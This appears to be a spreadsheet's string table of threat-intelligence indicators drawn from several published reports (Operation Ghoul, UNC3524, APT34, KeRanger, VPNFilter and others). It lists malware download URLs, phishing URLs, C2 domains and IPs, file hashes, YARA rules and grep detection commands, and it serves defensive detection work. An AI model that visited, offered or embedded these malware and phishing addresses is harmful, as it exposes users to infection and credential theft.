  <si>
    <t>Other malware links</t>
  </si>
  <si>
    <t>Operation Ghoul: targeted attacks on industrial and engineering organizations</t>
  </si>
  <si>
    <t>http://brokelimiteds.in/cdn/images/bro.exe</t>
  </si>
  <si>
    <t>http://brokelimiteds.in/cdn/images/onowu.exe</t>
  </si>
  <si>
    <t>http://brokelimiteds.in/cdn/images/obe.exe</t>
  </si>
  <si>
    <t>http://brokelimiteds.in/wp-admin/css/upload/order.exe</t>
  </si>
  <si>
    <t>http://brokelimiteds.in/wp-admin/css/upload/orders.exe</t>
  </si>
  <si>
    <t>http://papercuts.info/SocialMedia/java.exe</t>
  </si>
  <si>
    <t>http://studiousb.com/mercadolivrestudio/f.zip</t>
  </si>
  <si>
    <t>http://copylines.biz/lasagna/gate.php?request=true</t>
  </si>
  <si>
    <t>1471591251</t>
  </si>
  <si>
    <t>http://free.meedlifespeed.com/ComCast/</t>
  </si>
  <si>
    <t>Observed phishing URLs</t>
  </si>
  <si>
    <t>http://emailreferentie.appleid.apple.nl.468213579.com/</t>
  </si>
  <si>
    <t>http://468213579.com/emailreferentie.appleid.apple.nl/emailverificatie-40985443/home/login.php</t>
  </si>
  <si>
    <t>http://192.169.82.86/~gurgenle/verify/webmail/</t>
  </si>
  <si>
    <t>http://customer.comcast.com.aboranian.com/login</t>
  </si>
  <si>
    <t>http://apple-recovery.us/</t>
  </si>
  <si>
    <t>http://apple.security-block.com/Apple%20-%20My%20Apple%20ID.html</t>
  </si>
  <si>
    <t>http://https.portal.apple.com.idmswebauth.login.html.appidkey.05c7e09b5896b0334b3af1139274f266b2hxxp://2b68.f444c4f547116bfd052461b0b3ab1bc2b445a.com/login.html</t>
  </si>
  <si>
    <t>http://www.deluxepharmacy.net</t>
  </si>
  <si>
    <t>1471591297</t>
  </si>
  <si>
    <t>indyproject.org</t>
  </si>
  <si>
    <t>malware related domains</t>
  </si>
  <si>
    <t>studiousb.com</t>
  </si>
  <si>
    <t>copylines.biz</t>
  </si>
  <si>
    <t>glazeautocaree.com</t>
  </si>
  <si>
    <t>brokelimiteds.in</t>
  </si>
  <si>
    <t>meedlifespeed.com</t>
  </si>
  <si>
    <t>468213579.com</t>
  </si>
  <si>
    <t>357912468.com</t>
  </si>
  <si>
    <t>aboranian.com</t>
  </si>
  <si>
    <t>apple-recovery.us</t>
  </si>
  <si>
    <t>security-block.com</t>
  </si>
  <si>
    <t>com-wn.in</t>
  </si>
  <si>
    <t>f444c4f547116bfd052461b0b3ab1bc2b445a.com</t>
  </si>
  <si>
    <t>deluxepharmacy.net</t>
  </si>
  <si>
    <t>katynew.pw</t>
  </si>
  <si>
    <t>mercadojs.com</t>
  </si>
  <si>
    <t>1471591337</t>
  </si>
  <si>
    <t>55358155f96b67879938fe1a14a00dd6</t>
  </si>
  <si>
    <t>malware related MD5 hashes</t>
  </si>
  <si>
    <t>f9ef50c53a10db09fc78c123a95e8eec</t>
  </si>
  <si>
    <t>b8f6e6a0cb1bcf1f100b8d8ee5cccc4c</t>
  </si>
  <si>
    <t>07b105f15010b8c99d7d727ff3a9e70f</t>
  </si>
  <si>
    <t>ae2a78473d4544ed2acd46af2e09633d</t>
  </si>
  <si>
    <t>21ea64157c84ef6b0451513d0d11d02e</t>
  </si>
  <si>
    <t>08c18d38809910667bbed747b2746201</t>
  </si>
  <si>
    <t>fc8da575077ae3db4f9b5991ae67dab1</t>
  </si>
  <si>
    <t>8d46ee2d141176e9543dea9bf1c079c8</t>
  </si>
  <si>
    <t>36a9ae8c6d32599f21c9d1725485f1a3</t>
  </si>
  <si>
    <t>cc6926cde42c6e29e96474f740d12a78</t>
  </si>
  <si>
    <t>6e959ccb692668e70780ff92757d2335</t>
  </si>
  <si>
    <t>3664d7150ac98571e7b5652fd7e44085</t>
  </si>
  <si>
    <t>d87d26309ef01b162882ee5069dc0bde</t>
  </si>
  <si>
    <t>5a97d62dc84ede64846ea4f3ad4d2f93</t>
  </si>
  <si>
    <t>5a68f149c193715d13a361732f5adaa1</t>
  </si>
  <si>
    <t>dabc47df7ae7d921f18faf685c367889</t>
  </si>
  <si>
    <t>aaee8ba81bee3deb1c95bd3aaa6b13d7</t>
  </si>
  <si>
    <t>460e18f5ae3e3eb38f8cae911d447590</t>
  </si>
  <si>
    <t>c3cf7b29426b9749ece1465a4ab4259e</t>
  </si>
  <si>
    <t>1471591359</t>
  </si>
  <si>
    <t>%LOCALAPPDATA%\Microsoft\Windows\bthserv.exe</t>
  </si>
  <si>
    <t>%LOCALAPPDATA%\Microsoft\Windows\BsBhvScan.exe</t>
  </si>
  <si>
    <t>%LOCALAPPDATA%\Client\WinHttpAutoProxySync.exe</t>
  </si>
  <si>
    <t>%LOCALAPPDATA%\Client\WdiServiceHost.exe</t>
  </si>
  <si>
    <t>%TEMP%\AF7B1841C6A70C858E3201422E2D0BEA.dat</t>
  </si>
  <si>
    <t>%APPDATA%\Helper\Browser.txt</t>
  </si>
  <si>
    <t>%APPDATA%\Helper\Mail.txt</t>
  </si>
  <si>
    <t>%APPDATA%\Helper\Mess.txt</t>
  </si>
  <si>
    <t>%APPDATA%\Helper\OS.txt</t>
  </si>
  <si>
    <t>%ALLUSERSPROFILE%\Mails.txt</t>
  </si>
  <si>
    <t>%ALLUSERSPROFILE%\Browsers.txt</t>
  </si>
  <si>
    <t>1471591381</t>
  </si>
  <si>
    <t>192.169.82.86</t>
  </si>
  <si>
    <t>https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/</t>
  </si>
  <si>
    <t>1573244172</t>
  </si>
  <si>
    <t>1573244371</t>
  </si>
  <si>
    <t>185.254.188.11</t>
  </si>
  <si>
    <t>TinyPOS C2</t>
  </si>
  <si>
    <t>C2 With It All: From Ransomware To Carding</t>
  </si>
  <si>
    <t>techsupport.org.ru</t>
  </si>
  <si>
    <t>www.techsupport.org.ru</t>
  </si>
  <si>
    <t>techsupportlap.icu</t>
  </si>
  <si>
    <t>techsupportnet.icu</t>
  </si>
  <si>
    <t>1573244338</t>
  </si>
  <si>
    <t>jduuyerm.website</t>
  </si>
  <si>
    <t>185.212.128.189</t>
  </si>
  <si>
    <t>aefawexxr54xrtrt.softether.net</t>
  </si>
  <si>
    <t>d4be15adbbe135d172d5e0afcd191ae740df22de5d3beac98e188a3cf01a036b</t>
  </si>
  <si>
    <t>WSDB.bat</t>
  </si>
  <si>
    <t>a78bacb79d5d229aa8d6c574d1d8386664918a520beebc655975b04a61da1308</t>
  </si>
  <si>
    <t>WSDB.ps1</t>
  </si>
  <si>
    <t>e410b949d128ffb513af037355fe777b5b40799001a312843e405070308a3f36</t>
  </si>
  <si>
    <t>WSDB.xml</t>
  </si>
  <si>
    <t>3de852ed3bd3579cd9875108e121ba6fd68a66f8f6948cce072e8013ad1955ea</t>
  </si>
  <si>
    <t>c32_217061.exe</t>
  </si>
  <si>
    <t>fa7c7db9d33e1f4193bfe460d1a61096d75315212042a62bb3a30b3077511610</t>
  </si>
  <si>
    <t>c64_217061.exe</t>
  </si>
  <si>
    <t>0273d96cef6683e3fb205b8e841579b44bae16ff1e3ab57647b1a9d2947db5c7</t>
  </si>
  <si>
    <t>file.exe</t>
  </si>
  <si>
    <t>bc919680471fd1b631e80c37e83aeb6877f13f4ed47ae22100cf4d60e27a93a4</t>
  </si>
  <si>
    <t>mimikatz.exe</t>
  </si>
  <si>
    <t>b9a8710e55bb2d55bbeed9cebb83ac2f18f78818f0c05f18c96f766c8c47e2d9</t>
  </si>
  <si>
    <t>no135.exe</t>
  </si>
  <si>
    <t>f658ddcf8e87de957a81bb92d44ce02913b427e8bccbe663669ee2613d355555</t>
  </si>
  <si>
    <t>p1q135no.sfx.exe</t>
  </si>
  <si>
    <t>procdump64.exe</t>
  </si>
  <si>
    <t>89f8af1eb52f31b011982d7a1ecc1eed25af6c14bf5f317568a3450db5db7247</t>
  </si>
  <si>
    <t>q108.exe</t>
  </si>
  <si>
    <t>dcb76dc106e586c6f8bfa82832a66f525a9addb5450912004e92dd578ff2a60a</t>
  </si>
  <si>
    <t>q121k.exe</t>
  </si>
  <si>
    <t>04d0824f70be3666d79b2a49b85cf6b60b566d7b8cc9efd31195644514fb0cb1</t>
  </si>
  <si>
    <t>q135.exe</t>
  </si>
  <si>
    <t>08499612bcf7ccb250438ce8f6eed616511e27c762d66132fef93296007984ac</t>
  </si>
  <si>
    <t>q137k.exe</t>
  </si>
  <si>
    <t>svchost.exe</t>
  </si>
  <si>
    <t>619f0c489beac9a792b9b42fa6529b3faf4329692fb52d17123ef69733868845</t>
  </si>
  <si>
    <t>zap32.exe</t>
  </si>
  <si>
    <t>98a4f69eff1f91f63fb74420ee4c16be508aa203d04f66e98b1dcb554def61ee</t>
  </si>
  <si>
    <t>zap64.exe</t>
  </si>
  <si>
    <t>b1e883222f3205db59ff812c6f6097291df12b1784c9e64eef674ab3a173c07a</t>
  </si>
  <si>
    <t>q159.exe</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2019/11/c2-with-it-all.html</t>
  </si>
  <si>
    <t>1486456343</t>
  </si>
  <si>
    <t>1486658363</t>
  </si>
  <si>
    <t>https://badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/</t>
  </si>
  <si>
    <t>Several polish banks hacked, information stolen by unknown attackers</t>
  </si>
  <si>
    <t>1486456569</t>
  </si>
  <si>
    <t>c1364bbf63b3617b25b58209e4529d8c</t>
  </si>
  <si>
    <t>85d316590edfb4212049c4490db08c4b</t>
  </si>
  <si>
    <t>1bfbc0c9e0d9ceb5c3f4f6ced6bcfeae</t>
  </si>
  <si>
    <t>496207db444203a6a9c02a32aff28d563999736c</t>
  </si>
  <si>
    <t>4f0d7a33d23d53c0eb8b34d102cdd660fc5323a2</t>
  </si>
  <si>
    <t>bedceafa2109139c793cb158cec9fa48f980ff2b</t>
  </si>
  <si>
    <t>fc8607c155617e09d540c5030eabad9a9512f656f16b38682fd50b2007583e9b</t>
  </si>
  <si>
    <t>d4616f9706403a0d5a2f9a8726230a4693e4c95c58df5c753ccc684f1d3542e2</t>
  </si>
  <si>
    <t>cc6a731e9daff84bae4214603e1c3bad8d6735b0cbb2a0ec1635b36e6a38cb3a</t>
  </si>
  <si>
    <t>125.214.195.17</t>
  </si>
  <si>
    <t>196.29.166.218</t>
  </si>
  <si>
    <t>http://sap.misapor.ch/vishop/view.jsp?pagenum=1</t>
  </si>
  <si>
    <t>https://www.eye-watch.in/design/fancybox/Pnf.action</t>
  </si>
  <si>
    <t>1486657654</t>
  </si>
  <si>
    <t>knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js</t>
  </si>
  <si>
    <t>www.eye-watch.in</t>
  </si>
  <si>
    <t>www.eye-watch.in/design/fancybox/Pnf.action</t>
  </si>
  <si>
    <t>9216b29114fb6713ef228370cbfe4045</t>
  </si>
  <si>
    <t>e29fe3c181ac9ddbb242688b151f3310</t>
  </si>
  <si>
    <t>8e32fccd70cec634d13795bcb1da85ff</t>
  </si>
  <si>
    <t>9cc6854bc5e217104734043c89dc4ff8</t>
  </si>
  <si>
    <t>9914075cc687bdc352ee136ac6579707</t>
  </si>
  <si>
    <t>1.215.228.230</t>
  </si>
  <si>
    <t>107.190.190.21</t>
  </si>
  <si>
    <t>116.168.107.32</t>
  </si>
  <si>
    <t>120.107.163.79</t>
  </si>
  <si>
    <t>129.221.254.13</t>
  </si>
  <si>
    <t>131.11.224.116</t>
  </si>
  <si>
    <t>140.112.14.16</t>
  </si>
  <si>
    <t>169.45.142.150</t>
  </si>
  <si>
    <t>17.61.46.70</t>
  </si>
  <si>
    <t>18.200.16.237</t>
  </si>
  <si>
    <t>182.45.75.93</t>
  </si>
  <si>
    <t>203.66.57.237</t>
  </si>
  <si>
    <t>203.67.31.17</t>
  </si>
  <si>
    <t>204.136.221.47</t>
  </si>
  <si>
    <t>206.94.195.86</t>
  </si>
  <si>
    <t>21.190.190.107</t>
  </si>
  <si>
    <t>1486657655</t>
  </si>
  <si>
    <t>218.224.125.66</t>
  </si>
  <si>
    <t>32.107.168.116</t>
  </si>
  <si>
    <t>36.61.131.78</t>
  </si>
  <si>
    <t>47.221.136.204</t>
  </si>
  <si>
    <t>59.120.19.101</t>
  </si>
  <si>
    <t>59.173.0.74</t>
  </si>
  <si>
    <t>59.43.86.123</t>
  </si>
  <si>
    <t>70.46.61.17</t>
  </si>
  <si>
    <t>82.144.131.5</t>
  </si>
  <si>
    <t>86.195.94.206</t>
  </si>
  <si>
    <t>93.75.45.182</t>
  </si>
  <si>
    <t>https://niebezpiecznik.pl/post/jak-przeprowadzono-atak-na-knf-i-polskie-banki-oraz-kto-jeszcze-byl-na-celowniku-przestepcow/</t>
  </si>
  <si>
    <t>1652459097</t>
  </si>
  <si>
    <t>1652459344</t>
  </si>
  <si>
    <t>cloudns.asia</t>
  </si>
  <si>
    <t>QUIETEXIT Dynamic DN</t>
  </si>
  <si>
    <t>UNC3524: Eye Spy on Your Email</t>
  </si>
  <si>
    <t>dynu.net</t>
  </si>
  <si>
    <t>mywire.org</t>
  </si>
  <si>
    <t>webredirect.org</t>
  </si>
  <si>
    <t>pattern-in-file</t>
  </si>
  <si>
    <t>1652459241</t>
  </si>
  <si>
    <t>grep "\x48\x8b\x3c\xd3\x4c\x89\xe1\xf2\xae" -rs /</t>
  </si>
  <si>
    <t>Find QUIETEXIT hard-coded byte string using grep</t>
  </si>
  <si>
    <t>1652459274</t>
  </si>
  <si>
    <t>grep '\xDD\xE5\xD5\x97\x20\x53\x27\xBF\xF0\xA2\xBA\xCD\x96\x35\x9A\xAD\x1C\x75\xEB\x47' -rs /</t>
  </si>
  <si>
    <t>Find QUIETEXIT by looking for the hard-coded password value</t>
  </si>
  <si>
    <t>1652459303</t>
  </si>
  <si>
    <t>grep -e " -[Xx] -p [[:digit:]{2,6}]" -rs /etc</t>
  </si>
  <si>
    <t>Find QUIETEXIT persistence mechanisms in the appliance’s rc.local directory by looking for the command line arguments</t>
  </si>
  <si>
    <t>1652459324</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/unc3524-eye-spy-email</t>
  </si>
  <si>
    <t>1652458998</t>
  </si>
  <si>
    <t>rule QUIETEXIT_strings_x005F_x000D_
_x005F_x000D_
{_x005F_x000D_
_x005F_x000D_
    meta:_x005F_x000D_
_x005F_x000D_
        author = "Mandiant"_x005F_x000D_
_x005F_x000D_
        date_created = "2022-01-13"_x005F_x000D_
_x005F_x000D_
        date_modified = "2022-01-13"_x005F_x000D_
_x005F_x000D_
        rev = 1_x005F_x000D_
_x005F_x000D_
    strings:_x005F_x000D_
_x005F_x000D_
        $s1 = "auth-agent@openssh.com"_x005F_x000D_
_x005F_x000D_
        $s2 = "auth-%.8x-%d"_x005F_x000D_
_x005F_x000D_
        $s3 = "Child connection from %s:%s"_x005F_x000D_
_x005F_x000D_
        $s4 = "Compiled without normal mode, can't run without -i"_x005F_x000D_
_x005F_x000D_
        $s5 = "cancel-tcpip-forward"_x005F_x000D_
_x005F_x000D_
        $s6 = "dropbear_prng"_x005F_x000D_
_x005F_x000D_
        $s7 = "cron"_x005F_x000D_
_x005F_x000D_
    condition:_x005F_x000D_
_x005F_x000D_
        uint32be(0) == 0x7F454C46 and filesize &lt; 2MB and all of them_x005F_x000D_
_x005F_x000D_
}</t>
  </si>
  <si>
    <t>An object describing a YARA rule (or a YARA rule name) along with its version.</t>
  </si>
  <si>
    <t>misc</t>
  </si>
  <si>
    <t>5407acf5-5e65-4aea-9dc7-fcd43b9e396e</t>
  </si>
  <si>
    <t>QUIETEXIT_strings</t>
  </si>
  <si>
    <t>yara-rule-name</t>
  </si>
  <si>
    <t>1652459037</t>
  </si>
  <si>
    <t>rule REGEORG_Tuneller_generic_x005F_x000D_
_x005F_x000D_
{_x005F_x000D_
_x005F_x000D_
    meta:_x005F_x000D_
_x005F_x000D_
        author = "Mandiant"_x005F_x000D_
_x005F_x000D_
        date_created = "2021-12-20"_x005F_x000D_
_x005F_x000D_
        date_modified = "2021-12-20"_x005F_x000D_
_x005F_x000D_
        md5 = "ba22992ce835dadcd06bff4ab7b162f9"_x005F_x000D_
_x005F_x000D_
    strings:_x005F_x000D_
_x005F_x000D_
        $s1 = "System.Net.IPEndPoint"_x005F_x000D_
_x005F_x000D_
        $s2 = "Response.AddHeader"_x005F_x000D_
_x005F_x000D_
        $s3 = "Request.InputStream.Read"_x005F_x000D_
_x005F_x000D_
        $s4 = "Request.Headers.Get"_x005F_x000D_
_x005F_x000D_
        $s5 = "Response.Write"_x005F_x000D_
_x005F_x000D_
        $s6 = "System.Buffer.BlockCopy"_x005F_x000D_
_x005F_x000D_
        $s7 = "Response.BinaryWrite"_x005F_x000D_
_x005F_x000D_
        $s8 = "SocketException soex"_x005F_x000D_
_x005F_x000D_
    condition:_x005F_x000D_
_x005F_x000D_
        filesize &lt; 1MB and 7 of them_x005F_x000D_
_x005F_x000D_
}</t>
  </si>
  <si>
    <t>f07bd347-a60d-44e6-a97a-8edcb806b886</t>
  </si>
  <si>
    <t>REGEORG_Tuneller_generic</t>
  </si>
  <si>
    <t>1652459064</t>
  </si>
  <si>
    <t>rule UNC3524_sha1_x005F_x000D_
_x005F_x000D_
{_x005F_x000D_
_x005F_x000D_
    meta:_x005F_x000D_
_x005F_x000D_
        author = "Mandiant"_x005F_x000D_
_x005F_x000D_
        date_created = "2022-01-19"_x005F_x000D_
_x005F_x000D_
        date_modified = "2022-01-19"_x005F_x000D_
_x005F_x000D_
   strings:_x005F_x000D_
_x005F_x000D_
        $h1 = { DD E5 D5 97 20 53 27 BF F0 A2 BA CD 96 35 9A AD 1C 75 EB 47 }_x005F_x000D_
_x005F_x000D_
    condition:_x005F_x000D_
_x005F_x000D_
        uint32be(0) == 0x7F454C46 and filesize &lt; 10MB and all of them_x005F_x000D_
_x005F_x000D_
}</t>
  </si>
  <si>
    <t>9c240988-a536-44b9-a2a3-18d892271216</t>
  </si>
  <si>
    <t>UNC3524_sha1</t>
  </si>
  <si>
    <t>1652459152</t>
  </si>
  <si>
    <t>ba22992ce835dadcd06bff4ab7b162f9</t>
  </si>
  <si>
    <t>REGEORG GitHub version</t>
  </si>
  <si>
    <t>4255a2ce-b317-4b23-a850-74c715b437c6</t>
  </si>
  <si>
    <t>3d4dcc859c6ca7e5b36483ad84c9ceef34973f9a</t>
  </si>
  <si>
    <t>7b5e3c1c06d82b3e7309c258dfbd4bfcd476c8ffcb4cebda76146145502a5997</t>
  </si>
  <si>
    <t>1512771575</t>
  </si>
  <si>
    <t>1512771962</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html</t>
  </si>
  <si>
    <t>New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit</t>
  </si>
  <si>
    <t>1512771950</t>
  </si>
  <si>
    <t>a0e6933f4e0497269620f44a083b2ed4</t>
  </si>
  <si>
    <t>CVE-2017-11882 exploit document</t>
  </si>
  <si>
    <t>1512771768</t>
  </si>
  <si>
    <t>CVE-2017-11882</t>
  </si>
  <si>
    <t>9267d057c065ea7448aca1511c6f29c7</t>
  </si>
  <si>
    <t>b2d13a336a3eb7bd27612be7d4e334df</t>
  </si>
  <si>
    <t>4a7290a279e6f2329edd0615178a11ff</t>
  </si>
  <si>
    <t>841ce6475f271f86d0b5188e4f8bc6db</t>
  </si>
  <si>
    <t>52ca9a7424b3cc34099ad218623a0979</t>
  </si>
  <si>
    <t>bbde33f5709cb1452ab941c08acc775e</t>
  </si>
  <si>
    <t>247b2a9fcba6e9ec29ed818948939702</t>
  </si>
  <si>
    <t>c87b0b711f60132235d7440add0360b0</t>
  </si>
  <si>
    <t>http://mumbai-m.site</t>
  </si>
  <si>
    <t>http://dns-update.club</t>
  </si>
  <si>
    <t>63d66d99e46fb93676a4f475a65566d8</t>
  </si>
  <si>
    <t>CVE-2017-0199 exploit document</t>
  </si>
  <si>
    <t>1512771859</t>
  </si>
  <si>
    <t>94.23.172.164</t>
  </si>
  <si>
    <t>d85818e82a6e64ca185edfddba2d1b76</t>
  </si>
  <si>
    <t>c9f16f0be8c77f0170b9b6ce876ed7fb</t>
  </si>
  <si>
    <t>1512771918</t>
  </si>
  <si>
    <t>proxycheker.pro</t>
  </si>
  <si>
    <t>46.105.221.247</t>
  </si>
  <si>
    <t>148.251.55.110</t>
  </si>
  <si>
    <t>185.15.247.147</t>
  </si>
  <si>
    <t>145.239.33.100</t>
  </si>
  <si>
    <t>82.102.14.219</t>
  </si>
  <si>
    <t>e6ac6f18256c4dde5bf06a9191562f82</t>
  </si>
  <si>
    <t>3c63bff9ec0a340e0727e5683466f435</t>
  </si>
  <si>
    <t>eeb0ff0d8841c2ebe643fe328b6d9ef5</t>
  </si>
  <si>
    <t>fb464c365b94b03826e67eabe4bf9165</t>
  </si>
  <si>
    <t>635ed85bfcaab7208a8b5c730d3d0a8c</t>
  </si>
  <si>
    <t>13b338c47c52de3ed0b68e1cb7876ad2</t>
  </si>
  <si>
    <t>dbfea6154d4f9d7209c1875b2d5d70d5</t>
  </si>
  <si>
    <t>hpserver.online</t>
  </si>
  <si>
    <t>eaf3448808481fb1fdbb675bc5ea24de</t>
  </si>
  <si>
    <t>42449dd79ea7d2b5b6482b6f0d493498</t>
  </si>
  <si>
    <t>a3fcb4d23c3153dd42ac124b112f1bae</t>
  </si>
  <si>
    <t>ee1c482c41738aaa5964730dcbab5dff</t>
  </si>
  <si>
    <t>e516c3a3247af2f2323291a670086a8f</t>
  </si>
  <si>
    <t>anyportals.com</t>
  </si>
  <si>
    <t>1457294538</t>
  </si>
  <si>
    <t>e3ad733cea9eba29e86610050c1a15592e6c77820927b9edeb77310975393574</t>
  </si>
  <si>
    <t>New OS X Ransomware KeRanger Infected Transmission BitTorrent Client Installer</t>
  </si>
  <si>
    <t>31b6adb633cff2a0f34cefd2a218097f3a9a8176c9363cc70fe41fe02af810b9</t>
  </si>
  <si>
    <t>d7d765b1ddd235a57a2d13bd065f293a7469594c7e13ea7700e55501206a09b5</t>
  </si>
  <si>
    <t>ddc3dbee2a8ea9d8ed93f0843400653a89350612f2914868485476a847c6484a</t>
  </si>
  <si>
    <t>6061a554f5997a43c91f49f8aaf40c80a3f547fc6187bee57cd5573641fcf153</t>
  </si>
  <si>
    <t>lclebb6kvohlkcml.onion.link</t>
  </si>
  <si>
    <t>lclebb6kvohlkcml.onion.nu</t>
  </si>
  <si>
    <t>bmacyzmea723xyaz.onion.link</t>
  </si>
  <si>
    <t>bmacyzmea723xyaz.onion.nu</t>
  </si>
  <si>
    <t>nejdtkok7oz5kjoc.onion.link</t>
  </si>
  <si>
    <t>nejdtkok7oz5kjoc.onion.nu</t>
  </si>
  <si>
    <t>1527095278</t>
  </si>
  <si>
    <t>1527097628</t>
  </si>
  <si>
    <t>photobucket.com/user/nikkireed11/library</t>
  </si>
  <si>
    <t>Associated with 1st stage</t>
  </si>
  <si>
    <t>New VPNFilter malware targets at least 500K networking devices worldwide</t>
  </si>
  <si>
    <t>photobucket.com/user/kmila302/library</t>
  </si>
  <si>
    <t>photobucket.com/user/lisabraun87/library</t>
  </si>
  <si>
    <t>1527095279</t>
  </si>
  <si>
    <t>photobucket.com/user/eva_green1/library</t>
  </si>
  <si>
    <t>photobucket.com/user/monicabelci4/library</t>
  </si>
  <si>
    <t>photobucket.com/user/katyperry45/library</t>
  </si>
  <si>
    <t>photobucket.com/user/saragray1/library</t>
  </si>
  <si>
    <t>photobucket.com/user/millerfred/library</t>
  </si>
  <si>
    <t>photobucket.com/user/jeniferaniston1/library</t>
  </si>
  <si>
    <t>photobucket.com/user/amandaseyfried1/library</t>
  </si>
  <si>
    <t>photobucket.com/user/suwe8/library</t>
  </si>
  <si>
    <t>photobucket.com/user/bob7301/library</t>
  </si>
  <si>
    <t>toknowall.com</t>
  </si>
  <si>
    <t>91.121.109.209</t>
  </si>
  <si>
    <t>Associated with 2nd stage</t>
  </si>
  <si>
    <t>217.12.202.40</t>
  </si>
  <si>
    <t>94.242.222.68</t>
  </si>
  <si>
    <t>82.118.242.124</t>
  </si>
  <si>
    <t>46.151.209.33</t>
  </si>
  <si>
    <t>217.79.179.14</t>
  </si>
  <si>
    <t>91.214.203.144</t>
  </si>
  <si>
    <t>95.211.198.231</t>
  </si>
  <si>
    <t>195.154.180.60</t>
  </si>
  <si>
    <t>5.149.250.54</t>
  </si>
  <si>
    <t>91.200.13.76</t>
  </si>
  <si>
    <t>94.185.80.82</t>
  </si>
  <si>
    <t>62.210.180.229</t>
  </si>
  <si>
    <t>zuh3vcyskd4gipkm.onion/bin32/update.php</t>
  </si>
  <si>
    <t>50ac4fcd3fbc8abcaa766449841b3a0a684b3e217fc40935f1ac22c34c58a9ec</t>
  </si>
  <si>
    <t>1st stage malware</t>
  </si>
  <si>
    <t>0e0094d9bd396a6594da8e21911a3982cd737b445f591581560d766755097d92</t>
  </si>
  <si>
    <t>9683b04123d7e9fe4c8c26c69b09c2233f7e1440f828837422ce330040782d17</t>
  </si>
  <si>
    <t>2nd stage malware</t>
  </si>
  <si>
    <t>d6097e942dd0fdc1fb28ec1814780e6ecc169ec6d24f9954e71954eedbc4c70e</t>
  </si>
  <si>
    <t>4b03288e9e44d214426a02327223b5e516b1ea29ce72fa25a2fcef9aa65c4b0b</t>
  </si>
  <si>
    <t>9eb6c779dbad1b717caa462d8e040852759436ed79cc2172692339bc62432387</t>
  </si>
  <si>
    <t>37e29b0ea7a9b97597385a12f525e13c3a7d02ba4161a6946f2a7d978cc045b4</t>
  </si>
  <si>
    <t>776cb9a7a9f5afbaffdd4dbd052c6420030b2c7c3058c1455e0a79df0e6f7a1d</t>
  </si>
  <si>
    <t>8a20dc9538d639623878a3d3d18d88da8b635ea52e5e2d0c2cce4a8c5a703db1</t>
  </si>
  <si>
    <t>0649fda8888d701eb2f91e6e0a05a2e2be714f564497c44a3813082ef8ff250b</t>
  </si>
  <si>
    <t>f8286e29faa67ec765ae0244862f6b7914fcdde10423f96595cb84ad5cc6b344</t>
  </si>
  <si>
    <t>3rd stage plugins</t>
  </si>
  <si>
    <t>afd281639e26a717aead65b1886f98d6d6c258736016023b4e59de30b7348719</t>
  </si>
  <si>
    <t>d113ce61ab1e4bfcb32fb3c53bd3cdeee81108d02d3886f6e2286e0b6a006747</t>
  </si>
  <si>
    <t>Self-signed certificates fingerprints</t>
  </si>
  <si>
    <t>c52b3901a26df1680acbfb9e6184b321f0b22dd6c4bb107e5e071553d375c851</t>
  </si>
  <si>
    <t>f372ebe8277b78d50c5600d0e2af3fe29b1e04b5435a7149f04edd165743c16d</t>
  </si>
  <si>
    <t>be4715b029cbd3f8e2f37bc525005b2cb9cad977117a26fac94339a721e3f2a5</t>
  </si>
  <si>
    <t>27af4b890db1a611d0054d5d4a7d9a36c9f52dffeb67a053be9ea03a495a9302</t>
  </si>
  <si>
    <t>110da84f31e7868ad741bcb0d9f7771a0bb39c44785055e6da0ecc393598adc8</t>
  </si>
  <si>
    <t>fb47ba27dceea486aab7a0f8ec5674332ca1f6af962a1724df89d658d470348f</t>
  </si>
  <si>
    <t>b25336c2dd388459dec37fa8d0467cf2ac3c81a272176128338a2c1d7c083c78</t>
  </si>
  <si>
    <t>cd75d3a70e3218688bdd23a0f618add964603736f7c899265b1d8386b9902526</t>
  </si>
  <si>
    <t>909cf80d3ef4c52abc95d286df8d218462739889b6be4762a1d2fac1adb2ec2b</t>
  </si>
  <si>
    <t>044bfa11ea91b5559f7502c3a504b19ee3c555e95907a98508825b4aa56294e4</t>
  </si>
  <si>
    <t>c0f8bde03df3dec6e43b327378777ebc35d9ea8cfe39628f79f20b1c40c1b412</t>
  </si>
  <si>
    <t>8f1d0cd5dd6585c3d5d478e18a85e7109c8a88489c46987621e01d21fab5095d</t>
  </si>
  <si>
    <t>d5dec646c957305d91303a1d7931b30e7fb2f38d54a1102e14fd7a4b9f6e0806</t>
  </si>
  <si>
    <t>1527095334</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2018/05/VPNFilter.html</t>
  </si>
  <si>
    <t>https://www.reuters.com/article/us-cyber-routers-ukraine/cyber-firms-warn-on-suspected-russian-plan-to-attack-ukraine-idUSKCN1IO1U9</t>
  </si>
  <si>
    <t>cpe</t>
  </si>
  <si>
    <t>1527095860</t>
  </si>
  <si>
    <t>cpe:/h:cisco:wrvs4400n:-</t>
  </si>
  <si>
    <t>Affected devices</t>
  </si>
  <si>
    <t>cpe:/h:netgear:r6400:-</t>
  </si>
  <si>
    <t>cpe:/h:netgear:r8000:-</t>
  </si>
  <si>
    <t>cpe:/h:netgear:r7000:-</t>
  </si>
  <si>
    <t>1527097513</t>
  </si>
  <si>
    <t>cpe:/h:netgear:wnr1000v3:-</t>
  </si>
  <si>
    <t>cpe:/h:netgear:wnr2000:-</t>
  </si>
  <si>
    <t>Netgear DGN2200</t>
  </si>
  <si>
    <t>Netgear R6400</t>
  </si>
  <si>
    <t>Netgear R7000</t>
  </si>
  <si>
    <t>Netgear R8000</t>
  </si>
  <si>
    <t>Netgear WNR1000</t>
  </si>
  <si>
    <t>Netgear WNR2000</t>
  </si>
  <si>
    <t>QNAP TS251</t>
  </si>
  <si>
    <t>QNAP TS439 Pro</t>
  </si>
  <si>
    <t>Mikrotik 1016</t>
  </si>
  <si>
    <t>1527097548</t>
  </si>
  <si>
    <t>Mikrotik 1036</t>
  </si>
  <si>
    <t>1527097546</t>
  </si>
  <si>
    <t>Mikrotik 1072</t>
  </si>
  <si>
    <t>Linksys E1200</t>
  </si>
  <si>
    <t>Linksys E2500</t>
  </si>
  <si>
    <t>Linksys WRVS4400N</t>
  </si>
  <si>
    <t>1527097587</t>
  </si>
